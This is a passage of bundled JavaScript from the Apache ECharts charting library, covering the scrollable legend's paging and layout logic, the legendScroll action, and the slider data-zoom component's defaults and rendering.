@private\n         * @type {module:zrender/container/Group}\n         */\n        this.group.add(this._containerGroup = new Group$4());\n        this._containerGroup.add(this.getContentGroup());\n\n        /**\n         * @private\n         * @type {module:zrender/container/Group}\n         */\n        this.group.add(this._controllerGroup = new Group$4());\n\n        /**\n         *\n         * @private\n         */\n        this._showController;\n    },\n\n    /**\n     * @override\n     */\n    resetInner: function () {\n        ScrollableLegendView.superCall(this, 'resetInner');\n\n        this._controllerGroup.removeAll();\n        this._containerGroup.removeClipPath();\n        this._containerGroup.__rectSize = null;\n    },\n\n    /**\n     * @override\n     */\n    renderInner: function (itemAlign, legendModel, ecModel, api, selector, orient, selectorPosition) {\n        var me = this;\n\n        // Render content items.\n        ScrollableLegendView.superCall(this, 'renderInner', itemAlign,\n            legendModel, ecModel, api, selector, orient, selectorPosition);\n\n        var controllerGroup = this._controllerGroup;\n\n        // FIXME: support be 'auto' adapt to size number text length,\n        // e.g., '3/12345' should not overlap with the control arrow button.\n        var pageIconSize = legendModel.get('pageIconSize', true);\n        if (!isArray(pageIconSize)) {\n            pageIconSize = [pageIconSize, pageIconSize];\n        }\n\n        createPageButton('pagePrev', 0);\n\n        var pageTextStyleModel = legendModel.getModel('pageTextStyle');\n        controllerGroup.add(new Text({\n            name: 'pageText',\n            style: {\n                textFill: pageTextStyleModel.getTextColor(),\n                font: pageTextStyleModel.getFont(),\n                textVerticalAlign: 'middle',\n                textAlign: 'center'\n            },\n            silent: true\n        }));\n\n        createPageButton('pageNext', 1);\n\n        function createPageButton(name, iconIdx) {\n            var pageDataIndexName = name + 'DataIndex';\n            var icon = createIcon(\n                legendModel.get('pageIcons', true)[legendModel.getOrient().name][iconIdx],\n                {\n                    // Buttons will be created in each render, so we do not need\n                    // to worry about avoiding using legendModel kept in scope.\n                    onclick: bind(\n                        me._pageGo, me, pageDataIndexName, legendModel, api\n                    )\n                },\n                {\n                    x: -pageIconSize[0] / 2,\n                    y: -pageIconSize[1] / 2,\n                    width: pageIconSize[0],\n                    height: pageIconSize[1]\n                }\n            );\n            icon.name = name;\n            controllerGroup.add(icon);\n        }\n    },\n\n    /**\n     * @override\n     */\n    layoutInner: function (legendModel, itemAlign, maxSize, isFirstRender, selector, selectorPosition) {\n        var selectorGroup = this.getSelectorGroup();\n\n        var orientIdx = legendModel.getOrient().index;\n        var wh = WH$1[orientIdx];\n        var xy = XY$1[orientIdx];\n        var hw = WH$1[1 - orientIdx];\n        var yx = XY$1[1 - orientIdx];\n\n        selector && box(\n            // Buttons in selectorGroup always layout horizontally\n            'horizontal',\n            selectorGroup,\n            legendModel.get('selectorItemGap', true)\n        );\n\n        var selectorButtonGap = legendModel.get('selectorButtonGap', true);\n        var selectorRect = selectorGroup.getBoundingRect();\n        var selectorPos = [-selectorRect.x, -selectorRect.y];\n\n        var processMaxSize = clone(maxSize);\n        selector && (processMaxSize[wh] = maxSize[wh] - selectorRect[wh] - selectorButtonGap);\n\n        var mainRect = this._layoutContentAndController(legendModel, isFirstRender,\n            processMaxSize, orientIdx, wh, hw, yx\n        );\n\n        if (selector) {\n            if (selectorPosition === 'end') {\n                selectorPos[orientIdx] += mainRect[wh] + selectorButtonGap;\n            }\n            else {\n                var offset = selectorRect[wh] + selectorButtonGap;\n                selectorPos[orientIdx] -= offset;\n                mainRect[xy] -= offset;\n            }\n            mainRect[wh] += selectorRect[wh] + selectorButtonGap;\n\n            selectorPos[1 - orientIdx] += mainRect[yx] + mainRect[hw] / 2 - selectorRect[hw] / 2;\n            mainRect[hw] = Math.max(mainRect[hw], selectorRect[hw]);\n            mainRect[yx] = Math.min(mainRect[yx], selectorRect[yx] + selectorPos[1 - orientIdx]);\n\n            selectorGroup.attr('position', selectorPos);\n        }\n\n        return mainRect;\n    },\n\n    _layoutContentAndController: function (legendModel, isFirstRender, maxSize, orientIdx, wh, hw, yx) {\n        var contentGroup = this.getContentGroup();\n        var containerGroup = this._containerGroup;\n        var controllerGroup = this._controllerGroup;\n\n        // Place items in contentGroup.\n        box(\n            legendModel.get('orient'),\n            contentGroup,\n            legendModel.get('itemGap'),\n            !orientIdx ? null : maxSize.width,\n            orientIdx ? null : maxSize.height\n        );\n\n        box(\n            // Buttons in controller are layout always horizontally.\n            'horizontal',\n            controllerGroup,\n            legendModel.get('pageButtonItemGap', true)\n        );\n\n        var contentRect = contentGroup.getBoundingRect();\n        var controllerRect = controllerGroup.getBoundingRect();\n        var showController = this._showController = contentRect[wh] > maxSize[wh];\n\n        var contentPos = [-contentRect.x, -contentRect.y];\n        // Remain contentPos when scroll animation perfroming.\n        // If first rendering, `contentGroup.position` is [0, 0], which\n        // does not make sense and may cause unexepcted animation if adopted.\n        if (!isFirstRender) {\n            contentPos[orientIdx] = contentGroup.position[orientIdx];\n        }\n\n        // Layout container group based on 0.\n        var containerPos = [0, 0];\n        var controllerPos = [-controllerRect.x, -controllerRect.y];\n        var pageButtonGap = retrieve2(\n            legendModel.get('pageButtonGap', true), legendModel.get('itemGap', true)\n        );\n\n        // Place containerGroup and controllerGroup and contentGroup.\n        if (showController) {\n            var pageButtonPosition = legendModel.get('pageButtonPosition', true);\n            // controller is on the right / bottom.\n            if (pageButtonPosition === 'end') {\n                controllerPos[orientIdx] += maxSize[wh] - controllerRect[wh];\n            }\n            // controller is on the left / top.\n            else {\n                containerPos[orientIdx] += controllerRect[wh] + pageButtonGap;\n            }\n        }\n\n        // Always align controller to content as 'middle'.\n        controllerPos[1 - orientIdx] += contentRect[hw] / 2 - controllerRect[hw] / 2;\n\n        contentGroup.attr('position', contentPos);\n        containerGroup.attr('position', containerPos);\n        controllerGroup.attr('position', controllerPos);\n\n        // Calculate `mainRect` and set `clipPath`.\n        // mainRect should not be calculated by `this.group.getBoundingRect()`\n        // for sake of the overflow.\n        var mainRect = {x: 0, y: 0};\n\n        // Consider content may be overflow (should be clipped).\n        mainRect[wh] = showController ? maxSize[wh] : contentRect[wh];\n        mainRect[hw] = Math.max(contentRect[hw], controllerRect[hw]);\n\n        // `containerRect[yx] + containerPos[1 - orientIdx]` is 0.\n        mainRect[yx] = Math.min(0, controllerRect[yx] + controllerPos[1 - orientIdx]);\n\n        containerGroup.__rectSize = maxSize[wh];\n        if (showController) {\n            var clipShape = {x: 0, y: 0};\n            clipShape[wh] = Math.max(maxSize[wh] - controllerRect[wh] - pageButtonGap, 0);\n            clipShape[hw] = mainRect[hw];\n            containerGroup.setClipPath(new Rect({shape: clipShape}));\n            // Consider content may be larger than container, container rect\n            // can not be obtained from `containerGroup.getBoundingRect()`.\n            containerGroup.__rectSize = clipShape[wh];\n        }\n        else {\n            // Do not remove or ignore controller. Keep them set as placeholders.\n            controllerGroup.eachChild(function (child) {\n                child.attr({invisible: true, silent: true});\n            });\n        }\n\n        // Content translate animation.\n        var pageInfo = this._getPageInfo(legendModel);\n        pageInfo.pageIndex != null && updateProps(\n            contentGroup,\n            {position: pageInfo.contentPosition},\n            // When switch from \"show controller\" to \"not show controller\", view should be\n            // updated immediately without animation, otherwise causes weird effect.\n            showController ? legendModel : false\n        );\n\n        this._updatePageInfoView(legendModel, pageInfo);\n\n        return mainRect;\n    },\n\n    _pageGo: function (to, legendModel, api) {\n        var scrollDataIndex = this._getPageInfo(legendModel)[to];\n\n        scrollDataIndex != null && api.dispatchAction({\n            type: 'legendScroll',\n            scrollDataIndex: scrollDataIndex,\n            legendId: legendModel.id\n        });\n    },\n\n    _updatePageInfoView: function (legendModel, pageInfo) {\n        var controllerGroup = this._controllerGroup;\n\n        each$1(['pagePrev', 'pageNext'], function (name) {\n            var canJump = pageInfo[name + 'DataIndex'] != null;\n            var icon = controllerGroup.childOfName(name);\n            if (icon) {\n                icon.setStyle(\n                    'fill',\n                    canJump\n                        ? legendModel.get('pageIconColor', true)\n                        : legendModel.get('pageIconInactiveColor', true)\n                );\n                icon.cursor = canJump ? 'pointer' : 'default';\n            }\n        });\n\n        var pageText = controllerGroup.childOfName('pageText');\n        var pageFormatter = legendModel.get('pageFormatter');\n        var pageIndex = pageInfo.pageIndex;\n        var current = pageIndex != null ? pageIndex + 1 : 0;\n        var total = pageInfo.pageCount;\n\n        pageText && pageFormatter && pageText.setStyle(\n            'text',\n            isString(pageFormatter)\n                ? pageFormatter.replace('{current}', current).replace('{total}', total)\n                : pageFormatter({current: current, total: total})\n        );\n    },\n\n    /**\n     * @param {module:echarts/model/Model} legendModel\n     * @return {Object} {\n     *  contentPosition: Array.<number>, null when data item not found.\n     *  pageIndex: number, null when data item not found.\n     *  pageCount: number, always be a number, can be 0.\n     *  pagePrevDataIndex: number, null when no previous page.\n     *  pageNextDataIndex: number, null when no next page.\n     * }\n     */\n    _getPageInfo: function (legendModel) {\n        var scrollDataIndex = legendModel.get('scrollDataIndex', true);\n        var contentGroup = this.getContentGroup();\n        var containerRectSize = this._containerGroup.__rectSize;\n        var orientIdx = legendModel.getOrient().index;\n        var wh = WH$1[orientIdx];\n        var xy = XY$1[orientIdx];\n\n        var targetItemIndex = this._findTargetItemIndex(scrollDataIndex);\n        var children = contentGroup.children();\n        var targetItem = children[targetItemIndex];\n        var itemCount = children.length;\n        var pCount = !itemCount ? 0 : 1;\n\n        var result = {\n            contentPosition: contentGroup.position.slice(),\n            pageCount: pCount,\n            pageIndex: pCount - 1,\n            pagePrevDataIndex: null,\n            pageNextDataIndex: null\n        };\n\n        if (!targetItem) {\n            return result;\n        }\n\n        var targetItemInfo = getItemInfo(targetItem);\n        result.contentPosition[orientIdx] = -targetItemInfo.s;\n\n        // Strategy:\n        // (1) Always align based on the left/top most item.\n        // (2) It is user-friendly that the last item shown in the\n        // current window is shown at the begining of next window.\n        // Otherwise if half of the last item is cut by the window,\n        // it will have no chance to display entirely.\n        // (3) Consider that item size probably be different, we\n        // have calculate pageIndex by size rather than item index,\n        // and we can not get page index directly by division.\n        // (4) The window is to narrow to contain more than\n        // one item, we should make sure that the page can be fliped.\n\n        for (var i = targetItemIndex + 1,\n            winStartItemInfo = targetItemInfo,\n            winEndItemInfo = targetItemInfo,\n            currItemInfo = null;\n            i <= itemCount;\n            ++i\n        ) {\n            currItemInfo = getItemInfo(children[i]);\n            if (\n                // Half of the last item is out of the window.\n                (!currItemInfo && winEndItemInfo.e > winStartItemInfo.s + containerRectSize)\n                // If the current item does not intersect with the window, the new page\n                // can be started at the current item or the last item.\n                || (currItemInfo && !intersect(currItemInfo, winStartItemInfo.s))\n            ) {\n                if (winEndItemInfo.i > winStartItemInfo.i) {\n                    winStartItemInfo = winEndItemInfo;\n                }\n                else { // e.g., when page size is smaller than item size.\n                    winStartItemInfo = currItemInfo;\n                }\n                if (winStartItemInfo) {\n                    if (result.pageNextDataIndex == null) {\n                        result.pageNextDataIndex = winStartItemInfo.i;\n                    }\n                    ++result.pageCount;\n                }\n            }\n            winEndItemInfo = currItemInfo;\n        }\n\n        for (var i = targetItemIndex - 1,\n            winStartItemInfo = targetItemInfo,\n            winEndItemInfo = targetItemInfo,\n            currItemInfo = null;\n            i >= -1;\n            --i\n        ) {\n            currItemInfo = getItemInfo(children[i]);\n            if (\n                // If the the end item does not intersect with the window started\n                // from the current item, a page can be settled.\n                (!currItemInfo || !intersect(winEndItemInfo, currItemInfo.s))\n                // e.g., when page size is smaller than item size.\n                && winStartItemInfo.i < winEndItemInfo.i\n            ) {\n                winEndItemInfo = winStartItemInfo;\n                if (result.pagePrevDataIndex == null) {\n                    result.pagePrevDataIndex = winStartItemInfo.i;\n                }\n                ++result.pageCount;\n                ++result.pageIndex;\n            }\n            winStartItemInfo = currItemInfo;\n        }\n\n        return result;\n\n        function getItemInfo(el) {\n            if (el) {\n                var itemRect = el.getBoundingRect();\n                var start = itemRect[xy] + el.position[orientIdx];\n                return {\n                    s: start,\n                    e: start + itemRect[wh],\n                    i: el.__legendDataIndex\n                };\n            }\n        }\n\n        function intersect(itemInfo, winStart) {\n            return itemInfo.e >= winStart && itemInfo.s <= winStart + containerRectSize;\n        }\n    },\n\n    _findTargetItemIndex: function (targetDataIndex) {\n        if (!this._showController) {\n            return 0;\n        }\n\n        var index;\n        var contentGroup = this.getContentGroup();\n        var defaultIndex;\n\n        contentGroup.eachChild(function (child, idx) {\n            var legendDataIdx = child.__legendDataIndex;\n            // FIXME\n            // If the given targetDataIndex (from model) is illegal,\n            // we use defualtIndex. But the index on the legend model and\n            // action payload is still illegal. That case will not be\n            // changed until some scenario requires.\n            if (defaultIndex == null && legendDataIdx != null) {\n                defaultIndex = idx;\n            }\n            if (legendDataIdx === targetDataIndex) {\n                index = idx;\n            }\n        });\n\n        return index != null ? index : defaultIndex;\n    }\n\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * @event legendScroll\n * @type {Object}\n * @property {string} type 'legendScroll'\n * @property {string} scrollDataIndex\n */\nregisterAction(\n    'legendScroll', 'legendscroll',\n    function (payload, ecModel) {\n        var scrollDataIndex = payload.scrollDataIndex;\n\n        scrollDataIndex != null && ecModel.eachComponent(\n            {mainType: 'legend', subType: 'scroll', query: payload},\n            function (legendModel) {\n                legendModel.setScrollDataIndex(scrollDataIndex);\n            }\n        );\n    }\n);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * Legend component entry file8\n */\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar SliderZoomModel = DataZoomModel.extend({\n\n    type: 'dataZoom.slider',\n\n    layoutMode: 'box',\n\n    /**\n     * @protected\n     */\n    defaultOption: {\n        show: true,\n\n        // ph => placeholder. Using placehoder here because\n        // deault value can only be drived in view stage.\n        right: 'ph',  // Default align to grid rect.\n        top: 'ph',    // Default align to grid rect.\n        width: 'ph',  // Default align to grid rect.\n        height: 'ph', // Default align to grid rect.\n        left: null,   // Default align to grid rect.\n        bottom: null, // Default align to grid rect.\n\n        backgroundColor: 'rgba(47,69,84,0)',    // Background of slider zoom component.\n        // dataBackgroundColor: '#ddd',         // Background coor of data shadow and border of box,\n                                                // highest priority, remain for compatibility of\n                                                // previous version, but not recommended any more.\n        dataBackground: {\n            lineStyle: {\n                color: '#2f4554',\n                width: 0.5,\n                opacity: 0.3\n            },\n            areaStyle: {\n                color: 'rgba(47,69,84,0.3)',\n                opacity: 0.3\n            }\n        },\n        borderColor: '#ddd',                    // border color of the box. For compatibility,\n                                                // if dataBackgroundColor is set, borderColor\n                                                // is ignored.\n\n        fillerColor: 'rgba(167,183,204,0.4)',     // Color of selected area.\n        // handleColor: 'rgba(89,170,216,0.95)',     // Color of handle.\n        // handleIcon: 'path://M4.9,17.8c0-1.4,4.5-10.5,5.5-12.4c0-0.1,0.6-1.1,0.9-1.1c0.4,0,0.9,1,0.9,1.1c1.1,2.2,5.4,11,5.4,12.4v17.8c0,1.5-0.6,2.1-1.3,2.1H6.1c-0.7,0-1.3-0.6-1.3-2.1V17.8z',\n        /* eslint-disable */\n        handleIcon: 'M8.2,13.6V3.9H6.3v9.7H3.1v14.9h3.3v9.7h1.8v-9.7h3.3V13.6H8.2z M9.7,24.4H4.8v-1.4h4.9V24.4z M9.7,19.1H4.8v-1.4h4.9V19.1z',\n        /* eslint-enable */\n        // Percent of the slider height\n        handleSize: '100%',\n\n        handleStyle: {\n            color: '#a7b7cc'\n        },\n\n        labelPrecision: null,\n        labelFormatter: null,\n        showDetail: true,\n        showDataShadow: 'auto',                 // Default auto decision.\n        realtime: true,\n        zoomLock: false,                        // Whether disable zoom.\n        textStyle: {\n            color: '#333'\n        }\n    }\n\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar Rect$2 = Rect;\nvar linearMap$1 = linearMap;\nvar asc$2 = asc;\nvar bind$5 = bind;\nvar each$26 = each$1;\n\n// Constants\nvar DEFAULT_LOCATION_EDGE_GAP = 7;\nvar DEFAULT_FRAME_BORDER_WIDTH = 1;\nvar DEFAULT_FILLER_SIZE = 30;\nvar HORIZONTAL = 'horizontal';\nvar VERTICAL = 'vertical';\nvar LABEL_GAP = 5;\nvar SHOW_DATA_SHADOW_SERIES_TYPE = ['line', 'bar', 'candlestick', 'scatter'];\n\nvar SliderZoomView = DataZoomView.extend({\n\n    type: 'dataZoom.slider',\n\n    init: function (ecModel, api) {\n\n        /**\n         * @private\n         * @type {Object}\n         */\n        this._displayables = {};\n\n        /**\n         * @private\n         * @type {string}\n         */\n        this._orient;\n\n        /**\n         * [0, 100]\n         * @private\n         */\n        this._range;\n\n        /**\n         * [coord of the first handle, coord of the second handle]\n         * @private\n         */\n        this._handleEnds;\n\n        /**\n         * [length, thick]\n         * @private\n         * @type {Array.<number>}\n         */\n        this._size;\n\n        /**\n         * @private\n         * @type {number}\n         */\n        this._handleWidth;\n\n        /**\n         * @private\n         * @type {number}\n         */\n        this._handleHeight;\n\n        /**\n         * @private\n         */\n        this._location;\n\n        /**\n         * @private\n         */\n        this._dragging;\n\n        /**\n         * @private\n         */\n        this._dataShadowInfo;\n\n        this.api = api;\n    },\n\n    /**\n     * @override\n     */\n    render: function (dataZoomModel, ecModel, api, payload) {\n        SliderZoomView.superApply(this, 'render', arguments);\n\n        createOrUpdate(\n            this,\n            '_dispatchZoomAction',\n            this.dataZoomModel.get('throttle'),\n            'fixRate'\n        );\n\n        this._orient = dataZoomModel.get('orient');\n\n        if (this.dataZoomModel.get('show') === false) {\n            this.group.removeAll();\n            return;\n        }\n\n        // Notice: this._resetInterval() should not be executed when payload.type\n        // is 'dataZoom', origin this._range should be maintained, otherwise 'pan'\n        // or 'zoom' info will be missed because of 'throttle' of this.dispatchAction,\n        if (!payload || payload.type !== 'dataZoom' || payload.from !== this.uid) {\n            this._buildView();\n        }\n\n        this._updateView();\n    },\n\n    /**\n     * @override\n     */\n    remove: function () {\n        SliderZoomView.superApply(this, 'remove', arguments);\n        clear(this, '_dispatchZoomAction');\n    },\n\n    /**\n     * @override\n     */\n    dispose: function () {\n        SliderZoomView.superApply(this, 'dispose', arguments);\n        clear(this, '_dispatchZoomAction');\n    },\n\n    _buildView: function () {\n        var thisGroup = this.group;\n\n        thisGroup.removeAll();\n\n        this._resetLocation();\n        this._resetInterval();\n\n        var barGroup = this._displayables.barGroup = new Group();\n\n        this._renderBackground();\n\n        this._renderHandle();\n\n        this._renderDataShadow();\n\n        thisGroup.add(barGroup);\n\n        this._positionGroup();\n    },\n\n    /**\n     * @private\n     */\n    _resetLocation: function () {\n        var dataZoomModel = this.dataZoomModel;\n        var api = this.api;\n\n        // If some of x/y/width/height are not specified,\n        // auto-adapt according to target grid.\n        var coordRect = this._findCoordRect();\n        var ecSize = {width: api.getWidth(), height: api.getHeight()};\n        // Default align by coordinate system rect.\n        var positionInfo = this._orient === HORIZONTAL\n            ? {\n                // Why using 'right', because right should be used in vertical,\n                // and it is better to be consistent for dealing with position param merge.\n                right: ecSize.width - coordRect.x - coordRect.width,\n                top: (ecSize.height - DEFAULT_FILLER_SIZE - DEFAULT_LOCATION_EDGE_GAP),\n                width: coordRect.width,\n                height: DEFAULT_FILLER_SIZE\n            }\n            : { // vertical\n                right: DEFAULT_LOCATION_EDGE_GAP,\n                top: coordRect.y,\n                width: DEFAULT_FILLER_SIZE,\n                height: coordRect.height\n            };\n\n        // Do not write back to option and replace value 'ph', because\n        // the 'ph' value should be recalculated when resize.\n        var layoutParams = getLayoutParams(dataZoomModel.option);\n\n        // Replace the placeholder value.\n        each$1(['right', 'top', 'width', 'height'], function (name) {\n            if (layoutParams[name] === 'ph') {\n                layoutParams[name] = positionInfo[name];\n            }\n        });\n\n        var layoutRect = getLayoutRect(\n            layoutParams,\n            ecSize,\n            dataZoomModel.padding\n        );\n\n        this._location = {x: layoutRect.x, y: layoutRect.y};\n        this._size = [layoutRect.width, layoutRect.height];\n        this._orient === VERTICAL && this._size.reverse();\n    },\n\n    /**\n     * @private\n     */\n    _positionGroup: function () {\n        var thisGroup = this.group;\n        var location = this._location;\n        var orient = this._orient;\n\n        // Just use the first axis to determine mapping.\n        var targetAxisModel = this.dataZoomModel.getFirstTargetAxisModel();\n        var inverse = targetAxisModel && targetAxisModel.get('inverse');\n\n        var barGroup = this._displayables.barGroup;\n        var otherAxisInverse = (this._dataShadowInfo || {}).otherAxisInverse;\n\n        // Transform barGroup.\n        barGroup.attr(\n            (orient === HORIZONTAL && !inverse)\n            ? {scale: otherAxisInverse ? [1, 1] : [1, -1]}\n            : (orient === HORIZONTAL && inverse)\n            ? {scale: otherAxisInverse ? [-1, 1] : [-1, -1]}\n            : (orient === VERTICAL && !inverse)\n            ? {scale: otherAxisInverse ? [1, -1] : [1, 1], rotation: Math.PI / 2}\n            // Dont use Math.PI, considering shadow direction.\n            : {scale: otherAxisInverse ? [-1, -1] : [-1, 1], rotation: Math.PI / 2}\n        );\n\n        // Position barGroup\n        var rect = thisGroup.getBoundingRect([barGroup]);\n        thisGroup.attr('position', [location.x - rect.x, location.y - rect.y]);\n    },\n\n    /**\n     * @private\n     */\n    _getViewExtent: function () {\n        return [0, this._size[0]];\n    },\n\n    _renderBackground: function () {\n        var dataZoomModel = this.dataZoomModel;\n        var size = this._size;\n        var barGroup = this._displayables.barGroup;\n\n        barGroup.add(new Rect$2({\n            silent: true,\n            shape: {\n                x: 0, y: 0, width: size[0], height: size[1]\n            },\n            style: {\n                fill: dataZoomModel.get('backgroundColor')\n            },\n            z2: -40\n        }));\n\n        // Click panel, over shadow, below handles.\n        barGroup.add(new Rect$2({\n            shape: {\n                x: 0, y: 0, width: size[0], height: size[1]\n            },\n            style: {\n                fill: 'transparent'\n            },\n            z2: 0,\n            onclick: bind(this._onClickPanelClick, this)\n        }));\n    },\n\n    _renderDataShadow: function () {\n        var info = this._dataShadowInfo = this._prepareDataShadowInfo();\n\n        if (!info) {\n            return;\n        }\n\n        var size = this._size;\n        var seriesModel = info.series;\n        var data = seriesModel.getRawData();\n\n        var otherDim = seriesModel.getShadowDim\n            ? seriesModel.getShadowDim() // @see candlestick\n            : info.otherDim;\n\n        if (otherDim == null) {\n            return;\n        }\n\n        var otherDataExtent = data.getDataExtent(otherDim);\n        // Nice extent.\n        var otherOffset = (otherDataExtent[1] - otherDataExtent[0]) * 0.3;\n        otherDataExtent = [\n            otherDataExtent[0] - otherOffset,\n            otherDataExtent[1] + otherOffset\n        ];\n        var otherShadowExtent = [0, size[1]];\n\n        var thisShadowExtent = [0, size[0]];\n\n        var areaPoints = [[size[0], 0], [0, 0]];\n        var linePoints = [];\n        var step = thisShadowExtent[1] / (data.count() - 1);\n        var thisCoord = 0;\n\n        // Optimize for large data shadow\n        var stride = Math.round(data.count() / size[0]);\n        var lastIsEmpty;\n        data.each([otherDim], function (value, index) {\n            if (stride > 0 && (index % stride)) {\n                thisCoord += step;\n                return;\n            }\n\n            // FIXME\n            // Should consider axis.min/axis.max when drawing dataShadow.\n\n            // FIXME\n            // 应该使用统一的空判断？还是在list里进行空判断？\n            var isEmpty = value == null || isNaN(value) || value === '';\n            // See #4235.\n            var otherCoord = isEmpty\n                ? 0 : linearMap$1(value, otherDataExtent, otherShadowExtent, true);\n\n            // Attempt to draw data shadow precisely when there are empty value.\n            if (isEmpty && !lastIsEmpty && index) {\n                areaPoints.push([areaPoints[areaPoints.length - 1][0], 0]);\n                linePoints.push([linePoints[linePoints.length - 1][0], 0]);\n            }\n            else if (!isEmpty && lastIsEmpty) {\n                areaPoints.push([thisCoord, 0]);\n                linePoints.push([thisCoord, 0]);\n            }\n\n            areaPoints.push([thisCoord, otherCoord]);\n            linePoints.push([thisCoord, otherCoord]);\n\n            thisCoord += step;\n            lastIsEmpty = isEmpty;\n        });\n\n        var dataZoomModel = this.dataZoomModel;\n        // var dataBackgroundModel = dataZoomModel.getModel('dataBackground');\n        this._displayables.barGroup.add(new Polygon({\n            shape: {points: areaPoints},\n            style: defaults(\n                {fill: dataZoomModel.get('dataBackgroundColor')},\n                dataZoomModel.getModel('dataBackground.areaStyle').getAreaStyle()\n            ),\n            silent: true,\n            z2: -20\n        }));\n        this._displayables.barGroup.add(new Polyline({\n            shape: {points: linePoints},\n            style: dataZoomModel.getModel('dataBackground.lineStyle').getLineStyle(),\n            silent: true,\n            z2: -19\n        }));\n    },\n\n    _prepareDataShadowInfo: function () {\n        var dataZoomModel = this.dataZoomModel;\n        var showDataShadow = dataZoomModel.get('showDataShadow');\n\n        if (showDataShadow === false) {\n            return;\n        }\n\n        // Find a representative series.\n        var result;\n        var ecModel = this.ecModel;\n\n        dataZoomModel.eachTargetAxis(function (dimNames, axisIndex) {\n            var seriesModels = dataZoomModel\n                .getAxisProxy(dimNames.name, axisIndex)\n                .getTargetSeriesModels();\n\n            each$1(seriesModels, function (seriesModel) {\n                if (result) {\n                    return;\n                }\n\n                if (showDataShadow !== true && indexOf(\n                        SHOW_DATA_SHADOW_SERIES_TYPE, seriesModel.get('type')\n                    ) < 0\n                ) {\n                    return;\n                }\n\n                var thisAxis = ecModel.getComponent(dimNames.axis, axisIndex).axis;\n                var otherDim = getOtherDim(dimNames.name);\n                var otherAxisInverse;\n                var coordSys = seriesModel.coordinateSystem;\n\n                if (otherDim != null && coordSys.getOtherAxis) {\n                    otherAxisInverse = coordSys.getOtherAxis(thisAxis).inverse;\n                }\n\n                otherDim = seriesModel.getData().mapDimension(otherDim);\n\n                result = {\n                    thisAxis: thisAxis,\n                    series: seriesModel,\n                    thisDim: dimNames.name,\n                    otherDim: otherDim,\n                    otherAxisInverse: otherAxisInverse\n                };\n\n            }, this);\n\n        }, this);\n\n        return result;\n    },\n\n    _renderHandle: function () {\n        var displaybles = this._displayables;\n        var handles = displaybles.handles = [];\n        var handleLabels = displaybles.handleLabels = [];\n        var barGroup = this._displayables.barGroup;\n        var size = this._size;\n        var dataZoomModel = this.dataZoomModel;\n\n        barGroup.add(displaybles.filler = new Rect$2({\n            draggable: true,\n            cursor: getCursor(this._orient),\n            drift: bind$5(this._onDragMove, this, 'all'),\n            ondragstart: bind$5(this._showDataInfo, this, true),\n            ondragend: bind$5(this._onDragEnd, this),\n            onmouseover: bind$5(this._showDataInfo, this, true),\n            onmouseout: bind$5(this._showDataInfo, this, false),\n            style: {\n                fill: dataZoomModel.get('fillerColor'),\n                textPosition: 'inside'\n            }\n        }));\n\n        // Frame border.\n        barGroup.add(new Rect$2({\n            silent: true,\n            subPixelOptimize: true,\n            shape: {\n                x: 0,\n                y: 0,\n                width: size[0],\n                height: size[1]\n            },\n            style: {\n                stroke: dataZoomModel.get('dataBackgroundColor')\n                    || dataZoomModel.get('borderColor'),\n                lineWidth: DEFAULT_FRAME_BORDER_WIDTH,\n                fill: 'rgba(0,0,0,0)'\n            }\n        }));\n\n        each$26([0, 1], function (handleIndex) {\n            var path = createIcon(\n                dataZoomModel.get('handleIcon'),\n                {\n                    cursor: getCursor(this._orient),\n                    draggable: true,\n                    drift: bind$5(this._onDragMove, this, handleIndex),\n                    ondragend: bind$5(this._onDragEnd, this),\n                    onmouseover: bind$5(this._showDataInfo, this, true),\n                    onmouseout: bind$5(this._showDataInfo, this, false)\n                },\n                {x: -1, y: 0, width: 2, height: 2}\n            );\n\n            var bRect = path.getBoundingRect();\n            this._handleHeight = parsePercent$1(dataZoomModel.get('handleSize'), this._size[1]);\n            this._handleWidth = bRect.width / bRect.height * this._handleHeight;\n\n            path.setStyle(dataZoomModel.getModel('handleStyle').getItemStyle());\n            var handleColor = dataZoomModel.get('handleColor');\n            // Compatitable with previous version\n            if (handleColor != null) {\n                path.style.fill = handleColor;\n            }\n\n            barGroup.add(handles[handleIndex] = path);\n\n            var textStyleModel = dataZoomModel.textStyleModel;\n\n            this.group.add(\n                handleLabels[handleIndex] = new 